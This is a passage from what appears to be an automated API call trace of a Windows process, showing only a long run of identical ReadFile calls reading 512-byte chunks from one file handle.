lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, 
lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.973] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: 
lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.974] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, 
lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.975] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.976] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.977] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.983] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 
[0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.984] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, 
lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.985] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, 
lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.986] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: 
lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, lpOverlapped=0x0 | out: lpBuffer=0x2aebec*, lpNumberOfBytesRead=0x2adddc*=0x200, lpOverlapped=0x0) returned 1 [0149.987] ReadFile (in: hFile=0x58, lpBuffer=0x2aebec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adddc, 
